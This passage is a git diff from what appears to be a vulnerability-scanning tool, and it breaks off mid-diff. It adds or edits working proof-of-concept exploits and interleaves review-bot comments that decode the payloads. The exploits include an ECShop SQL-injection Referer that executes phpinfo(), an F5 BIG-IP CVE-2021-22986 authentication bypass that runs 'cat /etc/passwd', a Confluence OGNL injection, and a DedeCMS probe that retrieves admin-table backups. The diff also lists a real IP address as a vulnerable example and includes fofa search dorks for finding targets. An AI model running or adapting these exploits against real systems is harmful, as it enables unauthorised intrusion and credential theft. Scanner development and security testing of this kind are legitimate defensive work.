@@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "电信天翼网关F460 web_shell_cmd.gch 远程命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "电信天翼网关F460", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2014-03-03", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/__pycache__/poc.cpython-38.pyc b/poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..e3d830d Binary files /dev/null and b/poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Confluence/OGNL_Injection_CVE_2021_26084/__pycache__/poc.cpython-38.pyc b/poc/Confluence/OGNL_Injection_CVE_2021_26084/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c7b08b4 Binary files /dev/null and b/poc/Confluence/OGNL_Injection_CVE_2021_26084/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Confluence/OGNL_Injection_CVE_2021_26084/poc.py b/poc/Confluence/OGNL_Injection_CVE_2021_26084/poc.py index f005b6b..4605c61 100644 --- a/poc/Confluence/OGNL_Injection_CVE_2021_26084/poc.py +++ b/poc/Confluence/OGNL_Injection_CVE_2021_26084/poc.py @@ -53,7 +53,7 @@ class POC(POCBase): """ vuln = [False,""] url = self.target + "/pages/createpage-entervariables.action?SpaceKey=x" # url自己按需调整 - data = "queryString=Blen\\u0027%2b#{6*666}%2b\\u0027" + data = "queryString=ofx\\u0027%2b#{6*666}%2b\\u0027" headers = {"User-Agent":get_random_ua(), "Connection":"close", @@ -65,7 +65,7 @@ class POC(POCBase): 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) - if "Blen{3996=null}" in req.text: + if "ofx{3996=null}" in req.text: vuln = [True,req.text] else: vuln = [False,req.text] 
diff --git a/poc/Coremail/Conf_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Coremail/Conf_Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..8d87cbd Binary files /dev/null and b/poc/Coremail/Conf_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Coremail/Conf_Info_Disclosure/poc.py b/poc/Coremail/Conf_Info_Disclosure/poc.py index fb7ea6b..0663f4b 100644 --- a/poc/Coremail/Conf_Info_Disclosure/poc.py +++ b/poc/Coremail/Conf_Info_Disclosure/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Coremail 配置信息泄露漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "Coremail", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/CtCMS_赤兔CMS/Get_Banner/__pycache__/poc.cpython-38.pyc b/poc/CtCMS_赤兔CMS/Get_Banner/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..24c7faa Binary files /dev/null and b/poc/CtCMS_赤兔CMS/Get_Banner/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/CtCMS_赤兔CMS/Get_Banner/poc.py b/poc/CtCMS_赤兔CMS/Get_Banner/poc.py index 840540d..c04ba3e 100644 --- a/poc/CtCMS_赤兔CMS/Get_Banner/poc.py +++ b/poc/CtCMS_赤兔CMS/Get_Banner/poc.py @@ -19,7 +19,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "赤兔CMS banner识别插件", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "赤兔CMS", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/DVR/Login_Bypass_CVE_2018_9995/__pycache__/poc.cpython-38.pyc b/poc/DVR/Login_Bypass_CVE_2018_9995/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d919e32 Binary files /dev/null and b/poc/DVR/Login_Bypass_CVE_2018_9995/__pycache__/poc.cpython-38.pyc differ 
diff --git a/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/__pycache__/poc.cpython-38.pyc b/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..bcaed03 Binary files /dev/null and b/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/poc.py b/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/poc.py index 0942745..8fa7c22 100644 --- a/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/poc.py +++ b/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/poc.py @@ -19,7 +19,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "D-Link ShareCenter DNS-320", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/__pycache__/poc.cpython-38.pyc b/poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c3e6ae6 Binary files /dev/null and b/poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/D_Link/UPInfo_Disclosure_getcfg_php/poc.py b/poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/poc.py similarity index 100% rename from poc/D_Link/UPInfo_Disclosure_getcfg_php/poc.py rename to poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/poc.py diff --git a/poc/D_Link/Weak_Pass_AC_Manager/__pycache__/poc.cpython-38.pyc b/poc/D_Link/Weak_Pass_AC_Manager/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..e73a5db Binary files /dev/null and b/poc/D_Link/Weak_Pass_AC_Manager/__pycache__/poc.cpython-38.pyc differ 
diff --git a/poc/D_Link/Weak_Pass_AC_Manager/poc.py b/poc/D_Link/Weak_Pass_AC_Manager/poc.py index 7ec186c..d36937d 100644 --- a/poc/D_Link/Weak_Pass_AC_Manager/poc.py +++ b/poc/D_Link/Weak_Pass_AC_Manager/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "D-Link AC管理系统默认账号密码", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "D-Link AC管理系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/__pycache__/poc.cpython-38.pyc b/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..2527b33 Binary files /dev/null and b/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/poc.py b/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/poc.py new file mode 100644 index 0000000..cce10fc --- /dev/null +++ b/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/poc.py 
@@ -0,0 +1,76 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + 备份文件的地址会写在md输出中 + """, # POC描述,写更新描述,没有就不写 + + "name" : "DedeCMS 短文件名信息泄露", # 漏洞名称 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + IIS下,会因为固有的短文件名问题导致配置文件的地址可以被猜解 + 猜解出来的文件url,存的信息是dede_admin表的备份,可能存在过期现象,要有心理准备 + """, # 漏洞简要描述 + + "fofa-dork":""" + + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/data/backupdata/dede_a~" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + for i in range(1,9): + now_url = url + str(i) + ".txt" + req = requests.get(now_url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and "INSERT INTO `dede_admin`" in req.text: + vuln = [True,"" + now_url + "\n" + req.text] + break + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file 
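Review bot: `vuln = [True,"" + now_url + "\n" + req.text]` inside the `for i in range(1,9)` loop has a redundant `"" +` prefix; `vuln = [True, now_url + "\n" + req.text]` is the same value. The `try` wraps the whole loop, so a single timeout on one candidate aborts the remaining ones via `raise e` instead of moving on to the next index — if that is intended (the framework treating it as an error), a short comment saying so would help, and `except Exception as e: raise e` itself is a no-op that a bare `raise` replaces. `url_handle` is imported but never used in this file.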
diff --git a/poc/DedeCMS_织梦/RadminPass/__pycache__/poc.cpython-38.pyc b/poc/DedeCMS_织梦/RadminPass/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..6f4c93e Binary files /dev/null and b/poc/DedeCMS_织梦/RadminPass/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/DedeCMS_织梦/RadminPass/poc.py b/poc/DedeCMS_织梦/RadminPass/poc.py index 5ab6e97..9ea1e47 100644 --- a/poc/DedeCMS_织梦/RadminPass/poc.py +++ b/poc/DedeCMS_织梦/RadminPass/poc.py @@ -17,8 +17,8 @@ class POC(POCBase): 略 """, # POC描述,写更新描述,没有就不写 - "name" : "radminpass.php文件暴露", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "name" : "织梦CMS radminpass.php文件暴露", # 漏洞名称 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "dedecms", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/DocCMS/SQLi_keyword/__pycache__/poc.cpython-38.pyc b/poc/DocCMS/SQLi_keyword/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..b841ff3 Binary files /dev/null and b/poc/DocCMS/SQLi_keyword/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/DocCMS/SQLi_keyword/poc.py b/poc/DocCMS/SQLi_keyword/poc.py index fe4ff61..54d3d18 100644 --- a/poc/DocCMS/SQLi_keyword/poc.py +++ b/poc/DocCMS/SQLi_keyword/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "DocCMS keyword SQL注入漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "DocCMS", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/DrayTek/RCE_CVE_2020_8515/__pycache__/poc.cpython-38.pyc b/poc/DrayTek/RCE_CVE_2020_8515/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..b5ae1f7 Binary files /dev/null and b/poc/DrayTek/RCE_CVE_2020_8515/__pycache__/poc.cpython-38.pyc differ 
diff --git a/poc/Drupal!/RCE_CVE_2018_7600/__pycache__/poc.cpython-38.pyc b/poc/Drupal!/RCE_CVE_2018_7600/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..f11ec34
Binary files /dev/null and b/poc/Drupal!/RCE_CVE_2018_7600/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/ECShop/RCE_2dotX_OR_3dotX/__pycache__/poc.cpython-38.pyc b/poc/ECShop/RCE_2dotX_OR_3dotX/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..d3d2541
Binary files /dev/null and b/poc/ECShop/RCE_2dotX_OR_3dotX/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/ECShop/RCE_2dotX_OR_3dotX/poc.py b/poc/ECShop/RCE_2dotX_OR_3dotX/poc.py
new file mode 100644
index 0000000..ab76bec
--- /dev/null
+++ b/poc/ECShop/RCE_2dotX_OR_3dotX/poc.py
@@ -0,0 +1,73 @@
+# coding:utf-8
+import requests,re
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-01-01", # POC创建时间
+ "UpdateDate" : "2022-01-01", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "ECShop 2.x/3.x SQL 注入/远程代码执行漏洞", # 漏洞名称
+ "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/user.php?act=login" # url自己按需调整
+ regular = "PHP Version [0-9\.]+"
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Referer": """45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a""",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if re.search(regular,req.text):#req.status_code == 200 and :
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
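Review bot: The detection pattern on the `regular = "PHP Version [0-9\.]+"` line is a non-raw string, so `\.` is an invalid escape sequence that Python 3.12+ reports as a SyntaxWarning; write it as `regular = r"PHP Version [0-9\.]+"`. The hex blob in the Referer payload decodes to `{$asd'];phpinfo();//}xxx`, meaning this check verifies by executing `phpinfo()` on the target, yet `VulnDesc`, `AppName` and `fofa-dork` are all left empty — a `VulnDesc` stating that the probe runs PHP through the injected Referer, and which ECShop releases are affected, would let an operator judge that side effect before a batch scan. With the status-code test commented out in `if re.search(regular,req.text):`, any page that merely prints a PHP version string (an error page, for instance) is also reported as vulnerable, leaving `_honeypot_check` as the only guard; at minimum a comment should say why the 200 check was dropped.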
diff --git a/poc/ECShop/SQLi_delete_cart_goods/__pycache__/poc.cpython-38.pyc b/poc/ECShop/SQLi_delete_cart_goods/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..5848e40 Binary files /dev/null and b/poc/ECShop/SQLi_delete_cart_goods/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Elasticsearch/Cmd_Exec_MVEL_CVE-2014-3120/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/Cmd_Exec_MVEL_CVE-2014-3120/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4d0f9ac Binary files /dev/null and b/poc/Elasticsearch/Cmd_Exec_MVEL_CVE-2014-3120/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Elasticsearch/Code_Exec_Groovy_CVE-2015-1427/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/Code_Exec_Groovy_CVE-2015-1427/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..aa2fe15 Binary files /dev/null and b/poc/Elasticsearch/Code_Exec_Groovy_CVE-2015-1427/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Elasticsearch/Dir_Traversal_CVE-2015-5531/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/Dir_Traversal_CVE-2015-5531/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..fceb642 Binary files /dev/null and b/poc/Elasticsearch/Dir_Traversal_CVE-2015-5531/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Elasticsearch/File_Create_WooYun-2015-110216/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/File_Create_WooYun-2015-110216/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..053106a Binary files /dev/null and b/poc/Elasticsearch/File_Create_WooYun-2015-110216/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Elasticsearch/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/Unauth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..41bf8a2 Binary files /dev/null and b/poc/Elasticsearch/Unauth_Access/__pycache__/poc.cpython-38.pyc differ 
diff --git a/poc/Eyou_亿邮/RCE_moni_detail/__pycache__/poc.cpython-38.pyc b/poc/Eyou_亿邮/RCE_moni_detail/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..b2f205e Binary files /dev/null and b/poc/Eyou_亿邮/RCE_moni_detail/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/F5_BIG_IP/File_Read_CVE_2020_5902/__pycache__/poc.cpython-38.pyc b/poc/F5_BIG_IP/File_Read_CVE_2020_5902/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..982cce3 Binary files /dev/null and b/poc/F5_BIG_IP/File_Read_CVE_2020_5902/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/F5_BIG_IP/File_Read_CVE_2020_5902/poc.py b/poc/F5_BIG_IP/File_Read_CVE_2020_5902/poc.py index 269fcfa..e5c1d9b 100644 --- a/poc/F5_BIG_IP/File_Read_CVE_2020_5902/poc.py +++ b/poc/F5_BIG_IP/File_Read_CVE_2020_5902/poc.py @@ -33,7 +33,7 @@ class POC(POCBase): """, # 漏洞简要描述 "fofa-dork":""" - title="BIG-IP®" + title="BIG-IP®" """, # fofa搜索语句 "example" : "https://54.206.65.62:443", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 diff --git a/poc/F5_BIG_IP/RCE_CVE_2021-22986/__pycache__/poc.cpython-38.pyc b/poc/F5_BIG_IP/RCE_CVE_2021-22986/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..2294e13 Binary files /dev/null and b/poc/F5_BIG_IP/RCE_CVE_2021-22986/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/F5_BIG_IP/RCE_CVE_2021-22986/poc.py b/poc/F5_BIG_IP/RCE_CVE_2021-22986/poc.py new file mode 100644 index 0000000..f738899 --- /dev/null +++ b/poc/F5_BIG_IP/RCE_CVE_2021-22986/poc.py 
@@ -0,0 +1,75 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "CVE-2021-22986 RCE", # 漏洞名称
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ title="BIG-IP®"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/mgmt/tm/util/bash" # url自己按需调整
+ data = r'''{"command": "run", "utilCmdArgs": "-c 'cat /etc/passwd'"}'''
+
+ headers = {"User-Agent":get_random_ua(),
+ 'Accept': '*/*',
+ 'Connection': 'close',
+ 'Authorization': 'Basic YWRtaW46',
+ 'X-F5-Auth-Token': '',
+ 'Content-Type': 'application/json'
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if "root:/root" in req.text and req.status_code == 200:
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
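Review bot: `VulnDesc` and `AppVersion` are left empty on a PoC that runs a shell command on the appliance, and nothing explains why the request works: `'Authorization': 'Basic YWRtaW46'` is base64 of `admin:` (empty password) and is sent together with an empty `'X-F5-Auth-Token'`, which appears to be the authentication bypass against the `/mgmt/tm/util/bash` iControl REST endpoint — the description should say so and name the affected BIG-IP builds. The `"name" : "CVE-2021-22986 RCE"` entry also drops the product name every other PoC in this tree carries; `"F5 BIG-IP iControl REST 未授权远程代码执行 (CVE-2021-22986)"` would match the convention. Since `_attack` only returns `_verify`, `cat /etc/passwd` is the sole command ever executed; stating that in `PocDesc` tells operators the scan is read-only on the target.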
diff --git a/poc/FLIR_菲力尔/Download_File_AX8/__pycache__/poc.cpython-38.pyc b/poc/FLIR_菲力尔/Download_File_AX8/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..96950a8 Binary files /dev/null and b/poc/FLIR_菲力尔/Download_File_AX8/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/FLIR_菲力尔/Download_File_AX8/poc.py b/poc/FLIR_菲力尔/Download_File_AX8/poc.py index 3269b2e..32a996a 100644 --- a/poc/FLIR_菲力尔/Download_File_AX8/poc.py +++ b/poc/FLIR_菲力尔/Download_File_AX8/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "FLIR-AX8 download.php 任意文件下载", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "FLIR-AX8", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Flask_Ssti_CVE-2017-12636/poc.py b/poc/Flask_Ssti_CVE-2017-12636/poc.py deleted file mode 100644 index 308d66a..0000000 --- a/poc/Flask_Ssti_CVE-2017-12636/poc.py +++ /dev/null 
@@ -1,59 +0,0 @@ -# coding:utf-8 -import requests -from lib.core.common import url_handle,get_random_ua -# ... -import urllib3 -urllib3.disable_warnings() -_info = { - "author" : "", # POC作者 - "version" : "1", # POC版本,默认是1 - "CreateDate" : "2021-06-09", # POC创建时间 - "UpdateDate" : "2021-06-09", # POC创建时间 - "PocDesc" : """ - 该POC不具备使用价值,请忽略 - """, # POC描述,写更新描述,没有就不写 - - "name" : "Flask 模板注入", # 漏洞名称 - "AppName" : "Flask", # 漏洞应用名称 - "AppVersion" : "", # 漏洞应用版本 - "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx - "VulnDesc" : """ - - """, # 漏洞简要描述 - - "fofa-dork":"", # fofa搜索语句 - "example" : "", # 存在漏洞的演示url,写一个就可以了 - "exp_img" : "", # 先不管 - - "timeout" : 10, # 超时设定 -} - -def verify(host,proxy): - """ - 返回vuln - 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 - 不存在漏洞:vuln = [False,""] - """ - vuln = [False,""] - url = url_handle(host) + "/?name={{233*233}}" # url自己按需调整 - - - - headers = {"User-Agent":get_random_ua(), - "Connection":"close", - # "Content-Type": "application/x-www-form-urlencoded", - } - - try: - """ - 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动 - """ - req = requests.get(url,headers = headers , proxies = proxy ,timeout = self.timeout,verify = False) - if req.status_code == 200 and "54289" in req.text: - vuln = [True,req.text] - else: - vuln = [False,req.text] - except Exception as e: - raise e - - return vuln \ No newline at end of file diff --git a/poc/Grafana/File_Read_plugins/__pycache__/poc.cpython-38.pyc b/poc/Grafana/File_Read_plugins/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..20e77a0 Binary files /dev/null and b/poc/Grafana/File_Read_plugins/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/H2_DataBase/UnAuth_Access/__pycache__/poc.cpython-38.pyc b/poc/H2_DataBase/UnAuth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4cad1d4 Binary files /dev/null and b/poc/H2_DataBase/UnAuth_Access/__pycache__/poc.cpython-38.pyc differ 
diff --git a/poc/H2_DataBase/UnAuth_Access/poc.py b/poc/H2_DataBase/UnAuth_Access/poc.py index aeb1c32..3e05b91 100644 --- a/poc/H2_DataBase/UnAuth_Access/poc.py +++ b/poc/H2_DataBase/UnAuth_Access/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "H2 数据库 Web控制台未授权访问", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "H2 数据库", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/H3C/File_Download_SecPath_WAF/__pycache__/poc.cpython-38.pyc b/poc/H3C/File_Download_SecPath_WAF/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..2d6e641 Binary files /dev/null and 